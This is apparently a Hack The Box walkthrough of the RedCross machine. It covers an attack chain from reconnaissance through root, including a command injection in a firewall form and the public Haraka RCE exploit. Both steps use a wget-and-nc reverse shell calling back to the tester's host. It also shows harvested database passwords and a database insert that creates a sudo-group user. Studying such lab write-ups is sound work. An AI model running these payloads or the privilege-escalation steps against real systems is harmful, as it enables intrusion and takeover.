Port scanning

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 19:36 CST
Nmap scan report for 10.10.10.113
Host is up (0.073s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap -sT -sC -sV -O -p22,80,443 10.10.10.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 19:37 CST
Nmap scan report for 10.10.10.113
Host is up (0.071s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open ssl/http Apache httpd 2.4.38
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 5.0 - 5.5 (88%), Linux 2.6.32 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.70 seconds

Add hosts entries for redcross.htb and intra.redcross.htb pointing at 10.10.10.113 (further vhosts get added as they turn up).

Web

Not sure whether it's an environment problem, but as soon as I ran a directory scan the box locked up and the only fix was resetting it. sqlmap wouldn't run either: the moment it started, the site went down. There seems to be a WAF in front of it.

Fuzz for subdomains (vhosts, via the Host header):

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'https://10.10.10.113' -H "HOST:FUZZ.redcross.htb" -fw 20

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : https://10.10.10.113
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.redcross.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 20
________________________________________________

admin [Status: 302, Size: 363, Words: 18, Lines: 1, Duration: 66ms]
intra [Status: 302, Size: 463, Words: 26, Lines: 1, Duration: 63ms]

The login form doesn't offer much, so on to the contact page, where you can leave a message. I tried XSS there: the most common payloads are detected, and obfuscated variants didn't seem to fire either.

Since directory scanning was out, I checked a walkthrough: documentation/account-signup.pdf is reachable, and it explains that sending your username through the contact form gets you credentials.

Like this:

POST /pages/actions.php HTTP/1.1
Host: intra.redcross.htb
Cookie: PHPSESSID=7i6i2lcvhdku8vd6j7koqcbsg2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://intra.redcross.htb
Referer: https://intra.redcross.htb/?page=contact
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

subject=credentials&body=username%3Dmikannse&cback=111&action=contact

That yields the credentials guest:guest, but there is nothing of interest after logging in. On to the admin site.

Another login page. guest:guest doesn't get in here, but pasting in the PHPSESSID cookie from the intra login redirects straight into a logged-in session: both vhosts accept the same session. From there a user can be created; it is assigned a password that works for SSH, but the SSH session lands in an extremely restricted, container-like environment with low privileges, so nothing usable yet.

The admin panel can add firewall allow-list entries. I tried command injection on the allow action, but it fails with a "string does not match" style check; the deny action, however, has no character check at all, so I used it for a reverse shell. Many of the usual one-liners failed (the box's tooling is sparse), so I uploaded an nc binary and used that for the callback, like so:

0.0.0.0;wget http://10.10.14.13:8000/nc -O /tmp/nc;chmod +x /tmp/nc;/tmp/nc -e /bin/bash 10.10.14.13 443

URL-encode it and send; the reverse shell comes back.
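As an added illustration (not code from this write-up and not the site's own source), here is the pattern behind the deny-form injection above, in Python: a vulnerable builder that splices the submitted value into one shell string, next to a hardened one that first validates the value as an IPv4 address and then passes it as its own argv element, so no shell ever parses it. The payload is the one sent above; the iptables command line and the function names are assumptions about what the back end does, since the site's PHP isn't shown here. The splitter shows what a POSIX shell would actually execute for the injected value.

```python
from __future__ import annotations

import ipaddress
import shlex
from urllib.parse import quote

# Constructed input: the exact value sent through the deny form above.
PAYLOAD = ("0.0.0.0;wget http://10.10.14.13:8000/nc -O /tmp/nc;"
           "chmod +x /tmp/nc;/tmp/nc -e /bin/bash 10.10.14.13 443")


def deny_cmd_vulnerable(ip: str) -> str:
    """Assumed shape of the bug: the form value is spliced into one shell string
    which is then handed to a shell (e.g. via PHP's shell_exec)."""
    return f"iptables -A INPUT -s {ip} -j DROP"


def shell_commands(cmdline: str) -> list[list[str]]:
    """Split a command line on unquoted ';' the way a POSIX shell would,
    returning each command as its own argv list."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok == ";":
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def valid_ipv4(value: str) -> bool:
    """Strict syntactic check: exactly four dotted decimal octets and nothing else."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def deny_cmd_hardened(ip: str) -> list[str]:
    """Validate first, then build an argv list so the value never reaches a shell."""
    if not valid_ipv4(ip):
        raise ValueError(f"rejected: not an IPv4 address: {ip!r}")
    return ["iptables", "-A", "INPUT", "-s", ip, "-j", "DROP"]


def url_encoded(value: str) -> str:
    """The form value as the browser/proxy sends it (';' becomes %3B)."""
    return quote(value, safe="")


if __name__ == "__main__":
    print("form value as sent:", url_encoded(PAYLOAD))
    for argv in shell_commands(deny_cmd_vulnerable(PAYLOAD)):
        print("shell would run:", argv)
    try:
        deny_cmd_hardened(PAYLOAD)
    except ValueError as exc:
        print(exc)
    print("hardened, valid input:", deny_cmd_hardened("10.10.14.13"))
```

Run stand-alone it prints the four separate commands the shell executes for the injected value (iptables, wget, chmod, the nc callback), then the rejection from the hardened path. The same check belongs on the allow form; quoting the value with shlex.quote but skipping validation would only turn the injection into a failed iptables call, which is why validation and an argv list are used together.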

Privilege escalation

In users.php I find the database connection line; it's PostgreSQL:

$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");

init.php holds another credential, for the MySQL connection:

cat init.php
<?php
#database configuration
$dbhost='127.0.0.1';
$dbuser='dbcross';
$dbpass='LOSPxnme4f5pH5wp';
$dbname='redcross';
?>

Neither database yields anything useful.

There are also quite a few listening ports that the scan never saw:

www-data@redcross:/var/www/html/admin/pages$ ss -tlnp
ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 0.0.0.0:5432 0.0.0.0:*
LISTEN 0 128 127.0.0.1:5433 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 128 [::]:5432 [::]:*
LISTEN 0 128 *:443 *:*
LISTEN 0 128 *:1025 *:*
LISTEN 0 128 *:80 *:*

Since the admin panel can add firewall allow-list entries, I add my VPN IP; a fresh port scan then shows more ports open:

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 11:07 CST
Nmap scan report for intra.redcross.htb (10.10.10.113)
Host is up (0.065s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
1025/tcp open NFS-or-IIS
5432/tcp open postgresql

Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds

penelope's home directory contains haraka, an SMTP server, which is the service listening on port 1025. There is a public remote RCE for it:

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ searchsploit haraka
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
Haraka < 2.8.9 - Remote Command Execution | linux/remote/41162.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The script appears to send a crafted mail automatically; change port 25 in the script to 1025, the port the box uses, and go for another reverse shell:

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ python2 41162.py -c "wget http://10.10.14.13:8000/nc -O /tmp/nc1;chmod +x /tmp/nc1;/tmp/nc1 -e /bin/bash 10.10.14.13 444" -t penelope@redcross.htb -m 10.10.10.113

That gives a shell as penelope. Earlier, actions.php could create users that were then able to SSH in, presumably by writing to the PostgreSQL database; the unixnss credential found before is too low-privileged for that, so the web code should hold another, higher-privileged one:

penelope@redcross:/tmp$ grep -ri "password" /var/www/html/
grep -ri "password" /var/www/html/
/var/www/html/admin/pages/login.php:echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
/var/www/html/admin/pages/firewall.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/users.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
/var/www/html/admin/pages/actions.php: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
/var/www/html/admin/pages/actions.php: if(password_verify($pass,$hash) and $role==0){
/var/www/html/admin/pages/actions.php: } else if(password_verify($pass,$hash)){
/var/www/html/admin/pages/actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
/var/www/html/admin/pages/actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
/var/www/html/intra/pages/login.php:echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
/var/www/html/intra/pages/actions.php: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
/var/www/html/intra/pages/actions.php: if(password_verify($pass,$hash)){

actions.php uses unixusrmgr:dheu%7wjx8B&

Connecting with this account, passwd_table is now readable, so I can insert a user with root-level access whose home directory is not under /var/jail. First generate a password hash:

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ openssl passwd -1 admin
$1$eHy5lJSj$9SNACRXaL6jMkFIaQSjj6/
penelope@redcross:/tmp$ psql -h 127.0.0.1 -U unixusrmgr -d unix
psql -h 127.0.0.1 -U unixusrmgr -d unix
Password for user unixusrmgr: dheu%7wjx8B&

psql (11.22 (Debian 11.22-0+deb10u1), server 9.6.7)
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('r0ot', '$1$eHy5lJSj$9SNACRXaL6jMkFIaQSjj6/', 27, '/home/r0ot');
INSERT 0 1

That adds a user r0ot with gid 27, the gid of the sudo group (which on Debian gets (ALL : ALL) ALL), and a home directory outside the jail. Log in over SSH with the password that was hashed (admin); sudo asks for the same password.
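As an added example (my code, not the write-up's and not anything on the box), the hash step and the INSERT above done in pure Python: an implementation of the crypt(3) MD5 scheme that openssl passwd -1 emits, a verify() that checks a password the way sshd/sudo do through crypt(), and a helper that renders the passwd_table INSERT with the column names used above. The assumption that passwd_table is read by an NSS module backed by the unix database is an inference from the unixnss user in users.php, not something the write-up states; the salt eHy5lJSj is reused so the output matches the openssl run above.

```python
from __future__ import annotations

import hashlib
import hmac
import re
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
SUDO_GID = 27            # Debian's 'sudo' group, as used in the INSERT above
SAFE_NAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def md5_crypt(password: str, salt: str) -> str:
    """crypt(3) MD5 scheme ("$1$salt$hash"), the format `openssl passwd -1` emits."""
    if salt.startswith("$1$"):
        salt = salt[3:]
    salt = salt.split("$", 1)[0][:8]          # at most 8 salt characters
    pw, sb, magic = password.encode(), salt.encode(), b"$1$"

    ctx = hashlib.md5(pw + magic + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for n in range(len(pw), 0, -16):          # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[: min(16, n)])
    i = len(pw)
    while i:                                  # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                     # fixed 1000-round stretching
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    out = []                                  # crypt's own base64 over transposed bytes
    for a, b, c3 in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c3]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return f"$1${salt}${''.join(out)}"


def new_salt(length: int = 8) -> str:
    """Fresh random salt from crypt's alphabet."""
    return "".join(secrets.choice(ITOA64) for _ in range(length))


def verify(password: str, hashed: str) -> bool:
    """Check a password against a "$1$" hash; constant-time compare on the result."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "1":
        return False
    return hmac.compare_digest(md5_crypt(password, parts[2]), hashed)


def passwd_table_insert(username: str, password: str, gid: int = SUDO_GID,
                        homedir: str | None = None, salt: str | None = None) -> str:
    """Render the INSERT for passwd_table (columns as in the write-up above)."""
    if not SAFE_NAME.match(username):
        raise ValueError(f"bad username: {username!r}")
    homedir = homedir or f"/home/{username}"
    if "'" in homedir:
        raise ValueError("quote character in homedir")
    hashed = md5_crypt(password, salt or new_salt())
    return ("INSERT INTO passwd_table (username, passwd, gid, homedir) "
            f"VALUES ('{username}', '{hashed}', {int(gid)}, '{homedir}');")


if __name__ == "__main__":
    print(md5_crypt("admin", "eHy5lJSj"))       # same salt as the openssl run above
    print(passwd_table_insert("r0ot", "admin", salt="eHy5lJSj"))
```

The point of the verify() helper is the defensive check: after the INSERT, `getent passwd r0ot` and a test login confirm the row is really served through NSS, and verify() is what you run against a dumped passwd_table to see whether weak passwords are in there. The username and homedir checks exist because the statement is rendered as a literal for psql; with a driver, pass the values as parameters instead.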

r0ot@redcross:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for r0ot:
Matching Defaults entries for r0ot on redcross:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User r0ot may run the following commands on redcross:
(ALL : ALL) ALL
r0ot@redcross:~$ sudo su
root@redcross:/home/r0ot# id
uid=0(root) gid=0(root) groups=0(root)

Closing thoughts

The experience on this box wasn't great: services kept falling over and I had to reset it several times. Still, it's an interesting box in itself, the PostgreSQL abuse especially. There seem to be several other privilege escalation paths as well, which are also worth looking into.